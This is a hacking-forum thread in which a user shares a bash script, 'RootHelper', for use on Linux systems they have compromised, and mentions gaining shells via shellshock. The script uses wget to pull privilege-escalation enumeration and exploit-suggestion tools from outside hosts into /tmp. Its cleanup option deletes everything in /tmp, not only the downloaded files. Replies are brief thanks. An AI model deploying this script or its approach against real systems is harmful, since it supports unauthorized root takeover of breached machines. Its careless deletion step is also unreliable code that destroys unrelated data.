May 24, 2017, 02:48:43 AM
Welcome, Guest. Please login or register.

The user's going to pick dancing pigs over security every time. -- Bruce Schneier

Author Topic: [Bash] RootHelper, shellscript to aid with privilege escalation.  (Read 1181 times)

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
So a while ago i was playing around with shellshock to get some OS shells on some Linux systems. If you've compromised a box getting root would be a priority, if you want to completely own the system in question. There are a number of exploit suggestion and enumeration scripts that help with this. However manually downloading and extracting archives and such can be a bother. Therefore i wrote a shellscript to do exactly that.

To use the script you will need to get it on the system you've compromised, from there you can simply run it

Code: [Select]
chmod +x roothelper.sh
And it will show you the options available and an informational message regarding the options. For clarity i will post it below as well.

Quote from: Usage
The 'Help' option displays this informational message.

The 'Download' option fetches the relevant files and places them in the /tmp/ directory.

The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead

The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.


Below is the code, and you can also directy download the script or clone my repo directly from github.

https://github.com/NullArray/RootHelper


Code: (bash) [Select]
#!/bin/bash

function usage()
{ printf "%b \a\n\nRoothelper will aid in the process of privilege escalation on a Linux system you compromised by fetching a number of enumeration
and exploit suggestion scripts. Below is a quick overview of the available options.
The 'Help' option displays this informational message.
The 'Download' option fetches the relevant files and places them in the /tmp/ directory.
The option 'Download and unzip' downloads all files and extracts the contents of zip archives to their individual subdirectories respectively, please
note; if the 'mkdir' command is unavailable however, the operation will not succeed and the 'Download' option should be used instead
The 'Clean up' option removes all downloaded files and 'Quit' exits roothelper.\n "
}

# Download and unzip
function dzip()
{    echo "Downloading and extracting scripts..."
    `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
    `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`                 
    `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip` 
    `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`   
    for zip in *.zip
    do
        dirname=`echo $zip | sed 's/\.zip$//'`
        if mkdir $dirname
        then
            if cd $dirname
            then
                unzip ../$zip
                cd ..
                rm -f $zip
            else
                echo "Could not unpack $zip - cd failed"
            fi
        else
            echo "Could not unpack $zip - mkdir failed"
        fi
    done
}

dir="/tmp/"

usage

printf "%b" "\a\n\nTo use roothelper please select an option below.:\n"

PS3='Please enter your choice: '
options=("Help" "Download" "Download and unzip" "Clean up" "Quit")
select opt in "${options[@]}"
do
    case $opt in
        "Help")
            usage
            printf "%b \n"
            ;;
        "Download")
            echo "Downloading scripts to /tmp/"
            `wget -O /tmp/ExploitSuggest.py http://www.securitysift.com/download/linuxprivchecker.py`
            `wget -O /tmp/LinEnum.zip https://github.com/rebootuser/LinEnum/archive/master.zip`                 
            `wget -O /tmp/ExploitSuggest_perl.zip https://github.com/PenturaLabs/Linux_Exploit_Suggester/archive/master.zip`
            `wget -O /tmp/unixprivesc.zip https://github.com/pentestmonkey/unix-privesc-check/archive/1_x.zip`
             printf "%b \n"
            ;;
        "Download and unzip")
            dzip
            printf "%b \n"
            ;;
         "Clean up")
            echo "Removing downloaded files"
            find $dir/* -exec rm {} \;
            printf "%b \n"
            ;;
        "Quit")
            break
            ;;
        *) echo invalid option;;
    esac
done

The scripts it fetches are below and the credit for them goes to their original authors of course.

https://github.com/rebootuser/LinEnum

https://github.com/PenturaLabs/Linux_Exploit_Suggester

http://www.securitysift.com/download/linuxprivchecker.py

https://github.com/pentestmonkey/unix-privesc-check

EDIT: Fixed semantic error.


« Last Edit: January 25, 2016, 06:35:43 AM by Vector »
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline Grey-Matter

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 112
  • Internets: +57/-0
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #1 on: January 11, 2016, 10:36:46 AM »
Thanx :) +1

Offline H4v0K

  • Administrator
  • Elite
  • *****
  • Posts: 1016
  • Internets: +986/-1
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #2 on: January 12, 2016, 02:58:13 PM »
Thanks for sharing , ill have to try this out next time im in the labs  +1

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #3 on: January 12, 2016, 03:20:17 PM »
Thanks for sharing , ill have to try this out next time im in the labs  +1

Awesome, let me know how it turns out :)
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline Grey-Matter

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 112
  • Internets: +57/-0

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline Malachai

  • Top Hat Member
  • Super Elite
  • ********
  • Posts: 2800
  • Internets: +18/-7
  • #!/bin/sh Day/Night (Grey Hat)
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #6 on: January 15, 2016, 03:39:04 PM »
great job
** Dont' judge me! **

*//
  Hope that Firewall works because your SCREWED  
  //*

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #7 on: January 24, 2016, 12:43:48 PM »
great job

Thank you, one does what one can.
"Words have no power to impress the mind without the exquisite horror of their reality"

Offline Vector

  • Prospect
  • *
  • Posts: 37
  • Internets: +10/-24
    • @AntiSec_Inc
Re: [Bash] RootHelper, shellscript to aid with privilege escalation.
« Reply #8 on: January 25, 2016, 06:36:03 AM »
Had a semantic error in the script, it has since been resolved.
"Words have no power to impress the mind without the exquisite horror of their reality"